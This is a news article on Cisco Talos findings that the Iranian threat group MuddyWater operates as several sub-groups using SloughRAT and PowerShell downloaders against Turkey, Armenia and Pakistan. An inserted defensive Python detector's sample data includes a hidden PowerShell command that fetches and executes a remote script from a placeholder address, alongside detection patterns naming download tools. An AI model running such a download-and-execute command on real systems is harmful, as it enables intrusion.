Iranian APT supergroup MuddyWater has been identified as the threat actor behind attempted phishing attacks against Turkey and other Asian countries, according to findings published by Cisco Talos. The conglomerate, which the U.S. Cyber Command has linked to Iran’s Ministry of Intelligence and Security, has now been identified as multiple subgroups operating under the MuddyWater name rather than one unified threat actor.
How and when the cyberattacks happened
The hacker group has reportedly been targeting these countries using a Windows script file (WSF)-based remote access trojan (RAT), dubbed “SloughRAT” by Cisco Talos. Using this malware, MuddyWater has attempted to conduct espionage, steal intellectual property and carry out ransomware attacks against the countries in the Arabian Peninsula it has zeroed in on. The group ran two campaigns against Turkey in November 2021, and targeted Armenia in June of the same year using the same types of Windows executable files.
In April 2021, Cisco Talos observed that this group also launched an attack against Pakistan via two different delivery mechanisms: one employing a PowerShell-based downloader to receive and execute additional PS1 commands from the command-and-control (C2) server, and another using a malicious document as the infection point, which claimed to be part of a court case in Pakistan.
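As an added illustration for defenders, not code from the Cisco Talos report or this article: a small detector run over constructed Windows process-creation events that flags the two behaviours described above, a script host launching a .wsf file from a user-writable path (or spawned by an Office document) and PowerShell fetching and immediately executing remote script content. Field names, paths and the 203.0.113.x address are all constructed sample data.

```python
import re

# Constructed sample process-creation events (Sysmon-style fields), not real telemetry.
SAMPLE_EVENTS = [
    {"parent": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r'wscript.exe //E:jscript "C:\Users\alice\AppData\Local\Temp\court_case.wsf"'},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -nop -w hidden -c IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.7/stage.ps1')"},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r'wscript.exe "C:\Program Files\Vendor\maintenance.wsf"'},  # benign admin script
    {"parent": r"C:\Windows\System32\svchost.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -File C:\Scripts\inventory.ps1"},  # benign scheduled task
]

SCRIPT_HOSTS = ("wscript.exe", "cscript.exe")
OFFICE_APPS = ("winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe")
# Locations a phished user can write to without admin rights.
USER_WRITABLE = re.compile(r"\\users\\[^\\]+\\(appdata|downloads|desktop|documents)\\", re.I)
# Fetch-from-network primitives combined with an in-memory execute primitive.
DOWNLOAD_CRADLE = re.compile(r"(downloadstring|downloadfile|invoke-webrequest|\biwr\b|\bcurl\b|\bwget\b)", re.I)
INVOKE = re.compile(r"\b(iex|invoke-expression)\b", re.I)


def classify(event):
    """Return the list of detection tags that apply to one process-creation event."""
    image = event["image"].rsplit("\\", 1)[-1].lower()
    parent = event["parent"].rsplit("\\", 1)[-1].lower()
    cmd = event["cmdline"]
    tags = []
    if image in SCRIPT_HOSTS and re.search(r"\.wsf\b", cmd, re.I):
        if USER_WRITABLE.search(cmd):
            tags.append("wsf_from_user_writable_path")
        if parent in OFFICE_APPS:
            tags.append("office_spawned_script_host")
    if image == "powershell.exe" and DOWNLOAD_CRADLE.search(cmd) and INVOKE.search(cmd):
        tags.append("powershell_download_and_execute")
    return tags


def scan(events):
    """Pair each event index with every tag it triggered; benign events produce nothing."""
    return [(i, tag) for i, event in enumerate(events) for tag in classify(event)]
```

The two benign events are included deliberately: a vendor .wsf under Program Files and a scheduled PowerShell script both pass, which is the false-positive check a practitioner would want before deploying a rule like this.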
MuddyWater as a collection of groups
According to Cisco Talos’ findings, the hacking group’s “Variety of lures and payloads — along with the targeting of several different geographic regions — strengthens our growing hypothesis that MuddyWater is a conglomerate of sub-groups rather than a single actor.”
The cybersecurity firm believes that the hacking group is a combination of smaller teams, each targeting specific regions such as the Arabian Peninsula and Asia using the different attack techniques described above. While MuddyWater is made up of smaller sub-groups, Cisco Talos believes that some of these teams are contracted out for attacks by the leaders and organizers of MuddyWater. One reason for this belief is that unique strings and watermarks have been identified as being shared between MuddyWater and the Phosphorus/Charming Kitten APT groups.
The techniques shared among these smaller teams appear to be preferred by threat actors in particular regions, which makes attacks using them distinguishable from the collective’s attacks in other areas. The two preferred attack methods highlighted by the cybersecurity firm were the SloughRAT Windows executable file and the Ligolo reverse tunneling tool, which was used against Middle Eastern countries in March 2021.
How to secure yourself and your business
While this hacker group has been targeting specific regions and countries around the world, cyber threats remain a concern for every individual and organization. With this in mind, it is important to have both antivirus software and thorough employee training in place, so that compromised systems are caught and employees are aware of the online risks and can avoid becoming victims.